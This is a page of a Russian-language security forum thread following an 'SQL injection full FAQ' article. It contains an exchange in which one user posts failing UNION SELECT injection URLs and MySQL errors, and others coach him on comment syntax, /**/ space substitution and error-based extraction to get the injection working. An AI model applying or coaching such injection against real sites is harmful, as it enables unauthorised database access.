HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 15 из 26 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.09.2010, 02:16
miako
Познающий
Регистрация: 20.01.2010
Сообщений: 43
Провел на форуме:
41357

Репутация: 6
По умолчанию
Как побороть ЧПУ? Куда подставлять параметры? Инпутов нет.
 

  #2  
Старый 21.09.2010, 07:53
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
В пункт 4.2 нужно добавить БОЛЬШИМИ БУКВАМИ что операторы в hex не будут работать
 

  #3  
Старый 29.11.2010, 16:27
HBWS
Участник форума
Регистрация: 26.11.2010
Сообщений: 226
Провел на форуме:
55104

Репутация: 0
По умолчанию
Самое полное руководство, из всех что видел. Спасибо.
 

  #4  
Старый 11.01.2011, 12:48
Greenday
Новичок
Регистрация: 11.11.2010
Сообщений: 3
Провел на форуме:
751

Репутация: 0
По умолчанию
Отличная статья.А где еще можно найти и скачать уязвимые скрипты для изучения уязвимости?
 

  #5  
Старый 08.05.2011, 01:53
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Есть страница

http://test/test/test.html

Попытался сделать инъекцию и вот что вышло

http://test/test/1'+UNION+SELECT+1,+2+--

Результат:

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
Что я сделал не так и как "добить" эту дырку?
 

  #6  
Старый 08.05.2011, 02:03
[RedSky]
Новичок
Регистрация: 04.05.2011
Сообщений: 10
Провел на форуме:
3598

Репутация: 10
По умолчанию
Цитата:
Сообщение от FreShBY  
Есть страница
http://test/test/test.html
Попытался сделать инъекцию и вот что вышло
http://test/test/1'+UNION+SELECT+1,+2+--
Результат:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+SELECT+1,+2+--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'+UNION+SELECT+1,+2+--' LIMIT 0,1
Что я сделал не так и как "добить" эту дырку?
Во-первых, коментарием "+--" ты кавычку не отсечешь.

Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
 

  #7  
Старый 08.05.2011, 02:06
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Цитата:
Сообщение от [RedSky  
"]
[RedSky] said:
Во-первых, коментарием "
+
--" ты кавычку не отсечешь.
Во-вторых, по ошибке видно данные в запрос попадают напрямую, о чем свидетельствуют плюсы в запросе, попробуй замену пробельного символа + т.к. у тебя выводится и ошибки майскула, то не составляет труда крутить как еррор-байсед.
Заменил на пробелы получил:

Код:
ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%202%20--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'%20UNION%20SELECT%201,%202%20--' LIMIT 0,1
 

  #8  
Старый 08.05.2011, 02:08
[RedSky]
Новичок
Регистрация: 04.05.2011
Сообщений: 10
Провел на форуме:
3598

Репутация: 10
По умолчанию
Цитата:
Сообщение от FreShBY  
Заменил на пробелы получил:
Код:
ou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%202%20--' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'%20UNION%20SELECT%201,%202%20--' LIMIT 0,1
Ну очевидно же, зачем на пробелы, данные идут без юрлдекода, крути со скобками, либо пробуй замену типо /**/
 

  #9  
Старый 08.05.2011, 02:16
FreShBY
Новичок
Регистрация: 03.05.2009
Сообщений: 14
Провел на форуме:
71723

Репутация: 10
По умолчанию
Цитата:
Сообщение от [RedSky  
"]
[RedSky] said:
Ну очевидно же, зачем на пробелы, данные идут без юрлдекода, крути со скобками, либо пробуй замену типо /**/
http://test/test/1'/**/UNION/**/SELECT/**/1,/**/2/**/--

По этой ссылке мне выдало:

Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
query=SELECT * FROM structure WHERE p_ID='933' AND url='1'' LIMIT 0,1
Я уже пол часа пробовал разные варианты, ничего что-то не проходит
 

  #10  
Старый 08.05.2011, 07:01
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
FreShBY, пробел в комментарии должен быть после символов "--", а не перед ними. Если выложишь ссылку, будет быстрее.
 
 
Страница 15 из 26 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.